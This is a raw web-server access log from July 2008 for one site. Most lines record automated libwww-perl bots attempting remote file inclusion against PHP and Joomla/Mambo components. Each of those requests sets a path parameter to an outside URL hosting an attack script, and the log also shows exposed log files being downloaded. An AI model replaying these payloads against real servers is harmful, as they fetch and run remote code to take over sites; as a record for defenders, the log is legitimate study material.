212.69.204.75 - - [06/Jul/2008:09:30:40 -0700] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:30:42 -0700] "GET /logs/access_080118.log/*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:30:47 -0700] "GET /logs/access_080313.log//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:30:49 -0700] "GET /logs/access.log/index.php?url=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:30:52 -0700] "GET /logs/access.log/index.php?url=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:30:55 -0700] "GET /logs/access_080129.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:30:55 -0700] "GET //main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:30:55 -0700] "GET /logs//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:31:02 -0700] "GET /logs/access_080129.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:31:02 -0700] "GET //main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:31:02 -0700] "GET /logs//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:31:14 -0700] "GET /logs/access_080313.log//main.php?appserv_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:31:23 -0700] "GET /logs/access_080316.log/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:31:27 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:31:27 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:31:27 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:31:36 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.viamax.biz/live/API/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:31:37 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.viamax.biz/live/API/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:31:37 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://www.viamax.biz/live/API/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:31:39 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:31:39 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:31:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.69.204.75 - - [06/Jul/2008:09:31:45 -0700] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://www.viamax.biz/live/API/cs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:31:46 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:31:46 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:31:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.170 - - [06/Jul/2008:09:32:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.22.182 - - [06/Jul/2008:09:32:09 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
59.106.19.69 - - [06/Jul/2008:09:32:13 -0700] "GET /errors.php?error=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
59.106.19.69 - - [06/Jul/2008:09:32:13 -0700] "GET /logs/errors.php?error=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:14 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:15 -0700] "GET /include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:15 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.170 - - [06/Jul/2008:09:32:15 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 17261 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.51.226 - - [06/Jul/2008:09:32:15 -0700] "GET /blog/ HTTP/1.0" 200 18252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:29 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:29 -0700] "GET /include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:30 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:32 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:32 -0700] "GET /include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:32:32 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:32:51 -0700] "GET /errors.php?error=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:32:54 -0700] "GET /logs/access_080329.log/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:32:54 -0700] "GET /plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:32:54 -0700] "GET /logs/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:32:58 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.238.16 - - [06/Jul/2008:09:32:58 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.238.16 - - [06/Jul/2008:09:32:58 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.238.16 - - [06/Jul/2008:09:32:58 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:33:06 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:33:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:33:06 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:09:33:14 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:09:33:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.117.238.16 - - [06/Jul/2008:09:33:21 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.151.6.190 - - [06/Jul/2008:09:33:23 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.84.182.98 - - [06/Jul/2008:09:33:37 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [06/Jul/2008:09:33:37 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [06/Jul/2008:09:33:42 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:33:55 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:33:58 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18593 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:33:58 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:33:59 -0700] "GET /logs/access_080313.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:34:09 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:34:17 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:34:18 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:34:19 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:34:19 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18593 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:34:19 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:09:34:20 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:34:22 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18601 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:09:34:22 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:09:34:24 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:09:34:24 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:34:28 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:34:30 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18601 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:34:30 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:34:31 -0700] "GET /logs/access_080103.log/index1.php?site=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:34:31 -0700] "GET /logs/index1.php?site=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:34:36 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:34:36 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
222.35.63.149 - - [06/Jul/2008:09:34:39 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:09:34:43 -0700] "GET /logs/access_080313.log//main.php?appserv_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
86.59.80.71 - - [06/Jul/2008:09:34:46 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kvcwesterlo.be/themes/phpkaox/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.59.80.71 - - [06/Jul/2008:09:34:47 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kvcwesterlo.be/themes/phpkaox/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.59.80.71 - - [06/Jul/2008:09:34:47 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kvcwesterlo.be/themes/phpkaox/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [06/Jul/2008:09:34:51 -0700] "GET /logs/access_080313.log/index1.php?=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [06/Jul/2008:09:34:51 -0700] "GET /index1.php?=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.6.34 - - [06/Jul/2008:09:34:52 -0700] "GET /logs/index1.php?=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:09:34:53 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:09:34:53 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.63.2.169 - - [06/Jul/2008:09:34:53 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fo-saverne.com/images/temp/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.3.32.28 - - [06/Jul/2008:09:35:00 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 566288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
68.167.209.90 - - [06/Jul/2008:09:35:03 -0700] "GET /logs/access_080218.log HTTP/1.0" 200 622413 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:09:35:03 -0700] "GET /logs/access_080218.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:35:03 -0700] "GET /logs/access.log/index1.php?site=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.100.34.11 - - [06/Jul/2008:09:35:08 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:35:08 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:35:09 -0700] "GET /include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:35:09 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.182.98 - - [06/Jul/2008:09:35:24 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:36:09 -0700] "GET /index2.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:36:11 -0700] "GET /logs/access_080313.log/main.php?s=http://carefreebabes.net./tgp/main/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:36:12 -0700] "GET /main.php?s=http://carefreebabes.net./tgp/main/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:36:13 -0700] "GET /logs/main.php?s=http://carefreebabes.net./tgp/main/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:09:36:29 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:36:32 -0700] "GET /logs/index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://carefreebabes.net./tgp/main/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:09:36:32 -0700] "GET //stats/http-download-stats.txt/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:36:33 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:36:33 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:09:36:33 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:09:36:34 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:36:35 -0700] "GET /index.php?option=com_dfcontact&view=archive&mosConfig_absolute_path=http://carefreebabes.net./tgp/main/id.txt? HTTP/1.1" 200 18529 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:36:37 -0700] "GET /logs/access_080218.log/include/functions_common.php?gl_root_path=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
